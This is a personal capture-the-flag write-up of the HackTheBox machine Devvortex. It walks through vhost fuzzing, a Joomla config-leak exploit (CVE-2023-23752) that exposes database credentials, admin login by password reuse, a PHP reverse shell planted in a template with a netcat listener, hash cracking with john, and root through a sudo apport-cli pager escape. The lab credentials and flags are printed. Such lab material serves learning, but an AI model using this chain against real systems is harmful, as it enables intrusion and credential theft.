# **Devvortex Walkthrough (HTB)**

Hello folks, I'm Abzee, a n00b trying to be the best one day. I decided to kick-start 2024 by rooting Devvortex on the HackTheBox platform. It was really fun to play with and I learnt a few things.
**Enumeration**
Let's start with a simple nmap scan (default top 1000 ports, scripts and version detection) to check for open ports on the given IP.
```
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ nmap -sC -sV --min-rate 2000 -oA nmap 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 17:48 WAT
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.67s latency).
Not shown: 722 filtered tcp ports (no-response), 277 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds
```
We have two open ports, SSH and HTTP. Nmap only lists 22 in the output above, but port 80 is open as well, as the request below shows. Let's see what we have on port 80 and get to the juicy part.
```
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ http 10.10.11.242
HTTP/1.1 302 Moved Temporarily
Connection: keep-alive
Content-Length: 154
Content-Type: text/html
Date: Mon, 01 Jan 2024 16:33:10 GMT
Location: http://devvortex.htb/
Server: nginx/1.18.0 (Ubuntu)
<html>
<head><title>302 Found</title></head>
<body>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
```
The redirect gives us a hostname, devvortex.htb, which the server expects in the Host header, so we add `10.10.11.242 devvortex.htb` to /etc/hosts before we can reach the web page.
```
sudo gedit /etc/hosts
```
With that entry in place, the web page loads without any problem.

A nice web page to dive into, but unfortunately I couldn't get anything out of it, so I moved on to fuzzing for virtual hosts with ffuf. The `-fs 154` filter matters here: 154 bytes is the size of the default 302 redirect nginx returns for any unknown Host value, so filtering it out leaves only the vhosts that answer differently.
```
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://devvortex.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 1882ms]
```
Oh nice. With this we can surely find a thing or two to exploit and get a foothold, but first let's add dev.devvortex.htb to /etc/hosts as well and visit the subdomain we just found.

It is running the Joomla CMS, and the installed version is vulnerable to an unauthenticated information disclosure (CVE-2023-23752). The bug affects Joomla 4.0.0 through 4.2.7: the `/api/index.php/v1/` web-services endpoints accept a `?public=true` parameter and then return the site configuration, database credentials included, and the user list without any authentication.

Link to exploit: https://www.exploit-db.com/exploits/51334
```
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ruby exploit.rb http://dev.devvortex.htb
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered
Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false
Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0
```
Boom!! Juicy credentials. The database user is lewis, and the user listing shows lewis is a Super User in Joomla, so the obvious move is to try the database password on the administrator login page at http://dev.devvortex.htb/administrator. Password reuse between the database account and the CMS account is what turns this config leak into a full admin compromise.

And we are in with these credentials.
```
User:lewis
Pass:P4ntherg0t1n5r3c0n##
```
**Foothold**
Since we are in, we can go to System, then Site Templates, where the template files can be edited from the browser.

index.php can't be edited because of the permissions set on it, so I edited offline.php instead, replaced its contents with my PHP reverse-shell payload, saved it and started a listener. Requesting `http://dev.devvortex.htb/templates/cassiopeia/offline.php` executes the payload and, boom, we receive a connection back.
```
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ rlwrap nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.124] from (UNKNOWN) [10.10.11.242] 40618
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
17:43:46 up 24 min, 1 user, load average: 2.49, 0.87, 0.51
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
logan pts/1 10.10.14.105 17:34 1:09 2:23 1:07 dd if=/dev/zero of=/dev/null
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@devvortex:/$
zsh: suspended rlwrap nc -nvlp 1337
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ stty raw -echo;fg
[1] + continued rlwrap nc -nvlp 1337
www-data@devvortex:/$ stty rows 21 cols 120
stty rows 21 cols 120
www-data@devvortex:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@devvortex:/$
```
We are in as www-data, which is no problem. Time to read the content of user.txt.
```
www-data@devvortex:/$ cd /home
cd /home
www-data@devvortex:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Sep 26 19:16 .
drwxr-xr-x 19 root root 4096 Oct 26 15:12 ..
drwxr-xr-x 3 logan logan 4096 Jan 1 17:48 logan
www-data@devvortex:/home$ cd logan
cd logan
www-data@devvortex:/home/logan$ ls -la
ls -la
total 32
drwxr-xr-x 3 logan logan 4096 Jan 1 17:48 .
drwxr-xr-x 3 root root 4096 Sep 26 19:16 ..
lrwxrwxrwx 1 root root 9 Oct 26 14:58 .bash_history -> /dev/null
-rw-r--r-- 1 logan logan 220 Sep 26 19:16 .bash_logout
-rw-r--r-- 1 logan logan 3771 Sep 26 19:16 .bashrc
drwx------ 2 logan logan 4096 Oct 26 15:12 .cache
-rw-r--r-- 1 logan logan 807 Sep 26 19:16 .profile
-rw-rw-r-- 1 logan logan 199 Jan 1 17:48 panic.c
-rw-r----- 1 root logan 33 Jan 1 17:19 user.txt
www-data@devvortex:/home/logan$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@devvortex:/home/logan$
```
We don't have permission to read user.txt unless we are logan, so let's look around for credentials.

The MySQL credentials leaked earlier (lewis / P4ntherg0t1n5r3c0n##) work against the local database, and the Joomla users table (`sd4fg_users`, given the `sd4fg_` prefix from the config leak) holds a bcrypt password hash for logan.

That gives us a hash to crack, and this is where JohnTheRipper comes in.
```
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ hashid hash
--File 'hash'--
Analyzing '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
--End of file 'hash'--
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ john --wordlist=/opt/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ john --show hash
?:tequieromucho
1 password hash cracked, 0 left
```
John to the rescue. Note the "No password hashes left to crack" message: john had already cracked this hash in an earlier run and found it in its pot file, which is why `--show` still prints the result, and the `?` before the password is just the empty username field of a bare hash file. We have a password, so let's try it on SSH.
```
User:logan
Pass:tequieromucho
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ssh logan@10.10.11.242
logan@10.10.11.242's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 2.0
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Jan 1 18:03:20 2024 from 10.10.14.105
logan@devvortex:~$ ls
panic.c user.txt
logan@devvortex:~$ cat user.txt
099c4620c4cbac6b4423a27f5456eecf
logan@devvortex:~$ whoami
logan
logan@devvortex:~$
```
**Privilege Escalation**
The wait is over; time to own the system, which is the sweetest part. First, let's see what sudo -l gives us.
```
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$
```
logan can run apport-cli as root through sudo, and the installed version, apport-cli 2.26.0, is affected by CVE-2023-1326: when apport-cli shows a report it hands it to a pager (less), and under sudo that pager runs as root, so a `!` shell escape from less gives a root shell. Later apport versions close this by running the pager with LESSSECURE=1, which disables less's shell escapes, so the trick only works on unpatched builds where sudo grants apport-cli.

Let's see how to use it to gain root.

Running `sudo /usr/bin/apport-cli -f` presents a menu. Select 1, then 3 in the next menu, and apport collects a report and shows the prompt below. This time the options are letters rather than numbers: answer V to view the report, which opens it in less, then type `!/bin/bash` at the less prompt and, boom, we are root.
```
Please reproduce the crash and collect a backtrace. See https://wiki.ubuntu.com/X/Backtracing for directions.
Press any key to continue...
..dpkg-query: no packages found matching xorg
....................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.5 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# cat /root/root.txt;hostname
ad22b7bb92bc869a4feb2511ed328110
devvortex
root@devvortex:/home/logan#
```
This is all for today and thanks for reading.